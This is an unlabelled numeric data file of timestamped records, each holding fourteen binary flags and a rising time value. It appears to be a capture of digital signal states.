0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5330100e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5330124e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5330132e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5330176e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5330200e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5330208e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5330228e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5330252e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5330276e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5330300e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5330324e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5330348e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5330400e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5330428e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5330452e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5330476e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5330500e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5330524e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5330548e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5330576e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5330600e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5330624e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5330632e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5330676e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5330700e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5330724e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5330748e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5330756e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5330772e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5330800e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5330852e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5330876e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5330900e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5330924e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5330948e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5330976e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5330980e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5331000e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5331028e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5331052e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5331076e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5331100e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5331124e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5331148e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5331180e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5331200e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5331228e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5331252e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5331276e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5331300e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5331324e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5331348e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5331380e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5331400e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5331428e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5331452e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5331476e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5331524e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5331552e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5331556e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5331580e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5331604e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5331628e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5331652e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5331676e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5331700e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5331728e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5331752e-02 0,0,0,0,1,1,0,0,0,0,0,0,0,0,2.5331756e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5331760e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5331804e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5331828e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5331852e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5331876e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5331928e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5331952e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5331956e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5331980e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5332004e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5332028e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5332052e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5332076e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5332100e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5332128e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5332152e-02 0,0,0,0,1,1,0,0,0,0,0,0,0,0,2.5332156e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5332160e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5332204e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5332228e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5332252e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5332276e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5332300e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5332328e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5332352e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5332380e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5332404e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5332428e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5332452e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5332476e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5332500e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5332528e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5332552e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5332580e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5332604e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5332628e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5332652e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5332676e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5332700e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5332728e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5332752e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5332780e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5332804e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5332828e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5332852e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5332876e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5332900e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5332928e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5332952e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5332980e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5333004e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5333028e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5333052e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5333076e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5333100e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5333124e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5333152e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5333180e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5333200e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5333228e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5333252e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5333276e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5333300e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5333324e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5333352e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5333380e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5333400e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5333428e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5333452e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5333476e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5333500e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5333524e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5333548e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5333580e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5333600e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5333628e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5333652e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5333676e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5333700e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5333724e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5333748e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5333772e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5333780e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,2.5458228e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,2.5458444e-02 1,0,0,0,1,1,0,0,0,1,0,1,0,1,2.5458460e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,2.5458492e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,1,2.5458804e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,2.5458828e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,2.5458836e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,2.5458852e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,2.5458876e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,2.5458900e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,2.5458928e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,2.5458952e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,2.5458980e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,2.5459004e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,2.5459028e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,2.5459052e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5459064e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5459076e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5459104e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5459128e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5459152e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5459180e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5459204e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5459228e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5459252e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5459276e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5459284e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5459328e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5459356e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5459360e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5459380e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5459404e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5459428e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5459452e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5459476e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5459500e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5459508e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5459552e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5459576e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,0,2.5459580e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5459584e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5459600e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5459628e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5459652e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5459676e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5459700e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5459724e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5459748e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5459776e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5459780e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5459800e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5459828e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5459832e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5459852e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5459876e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5459880e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5459924e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5459948e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5459976e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5460000e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5460008e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5460028e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5460052e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5460076e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5460100e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5460124e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5460148e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5460156e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5460200e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5460228e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,0,2.5460232e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5460236e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5460252e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5460276e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5460300e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5460324e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5460332e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5460376e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5460400e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5460408e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5460428e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5460452e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5460476e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5460500e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5460524e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5460548e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5460576e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5460600e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5460628e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5460652e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5460676e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5460700e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5460724e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5460748e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5460756e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5460776e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5460800e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5460828e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5460852e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5460876e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5460900e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5460908e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5460948e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5460976e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5461000e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5461028e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5461076e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5461100e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5461124e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5461148e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5461156e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5461176e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5461200e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5461228e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5461252e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5461276e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5461300e-02 1,0,0,0,1,0,0,0,0,1,0,0,0,0,2.5461304e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5461308e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5461348e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5461376e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,0,2.5461380e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5461384e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5461400e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5461428e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5461452e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5461476e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5461500e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5461524e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5461548e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5461576e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5461600e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5461628e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5461652e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5461676e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5461700e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5461724e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5461748e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5461776e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5461800e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5461828e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5461852e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5461876e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5461900e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5461924e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5461932e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5461976e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5462000e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5462008e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5462028e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5462052e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5462076e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5462100e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5462124e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5462148e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5462156e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5462176e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5462200e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,0,2.5462204e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5462208e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5462252e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5462276e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5462324e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5462348e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5462376e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5462400e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5462428e-02 1,0,0,0,1,0,0,0,0,1,0,0,0,0,2.5462452e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5462456e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5462476e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5462500e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5462508e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5462524e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5462548e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5462576e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5462600e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5462604e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5462652e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5462676e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5462684e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5462700e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5462724e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5462748e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5462776e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5462800e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5462828e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5462852e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5462876e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5462900e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5462924e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5462948e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5462976e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5463000e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5463028e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5463052e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5463076e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5463100e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5463124e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5463148e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5463176e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5463200e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5463228e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5463252e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5463276e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5463280e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5463300e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5463324e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5463332e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5463376e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5463400e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5463452e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5463476e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5463500e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5463524e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5463548e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5463576e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5463580e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5463600e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5463628e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5463632e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5463652e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5463676e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5463680e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5463724e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5463748e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5463756e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5463776e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5463800e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5463828e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5463852e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5463876e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5463900e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5463924e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5463948e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5463956e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5464000e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5464028e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,0,2.5464032e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5464036e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5464052e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5464076e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5464100e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5464124e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5464148e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5464176e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5464200e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5464228e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5464252e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5464276e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5464300e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5464324e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5464348e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5464376e-02 